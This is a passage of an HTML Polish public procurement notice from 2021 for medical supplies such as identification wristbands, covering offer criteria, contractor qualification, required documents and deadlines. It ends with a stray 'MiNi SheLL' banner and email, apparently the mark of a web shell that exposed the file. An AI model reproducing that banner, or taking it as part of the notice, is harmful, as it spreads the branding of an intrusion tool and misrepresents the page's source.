</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Opaska identyfikacyjna	-	150	kaseta	; </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 14100,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31680000-6 - Elektryczne artykuły i akcesoria</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe potwierdzające, że oferowane dostawy spełniają wymagania Zamawiającego:<br/>Materiały firmowe – np. foldery, katalogi, materiały informacyjne, karty charakterystyki, ulotki, instrukcje lub wyciągi z instrukcji, dokumentacje techniczne, świadectwa rejestracji, oświadczenia producenta – potwierdzające, że oferowane wyroby/materiały spełniają wymagania określone przez Zamawiającego. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Materiały firmowe – np. foldery, katalogi, materiały informacyjne, karty charakterystyki, ulotki, instrukcje lub wyciągi z instrukcji, dokumentacje techniczne, świadectwa rejestracji, oświadczenia producenta – potwierdzające, że oferowane wyroby/materiały spełniają wymagania określone przez Zamawiającego. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty przekazywanej w postaci elektronicznej należy dołączyć następujące dokumenty w postaci elektronicznej, opatrzonej przez Wykonawcę kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym pod rygorem nieważności:<br/>1.1. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy formularz oferty , sporządzony według wzoru stanowiącego załącznik nr 1 do SWZ.<br/>1.2. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy arkusz cenowy, sporządzony według wzoru stanowiącego załącznik nr 1a do SWZ. <br/>1.3. Aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym w załączniku nr 2 do SWZ.<br/>1.4. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy, w postaci elektronicznej opatrzonej przez Wykonawcę kwalifikowanym podpisem elektronicznym pod rygorem nieważności, lub jako cyfrowe odwzorowanie dokumentu opatrzone kwalifikowanym podpisem elektronicznym:<br/>1.4.1 dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z odpisu z właściwego rejestru, który Zamawiający może uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 roku o informatyzacji działalności podmiotów realizujących zadania publiczne.<br/>1.4.2 dla ustanowionego pełnomocnika, do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy – dotyczy wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>1.5. Dokumenty, z których wynika prawo do podpisania oferty - w przypadku, gdy prawo do podpisania oferty nie wynika z odpisu z właściwego rejestru, który Zamawiający może uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 roku o informatyzacji działalności podmiotów realizujących zadania publiczne, względnie innych dokumentów złożonych wraz z ofertą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Szczegóły zostały zawarte w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Reguluje wzór umowy stanowiący załącznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-11 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać za pośrednictwem kanału elektronicznej komunikacji pod adresem: https://www.soldea.pl/epz/epz/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-11 12:01</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-09</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-30 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com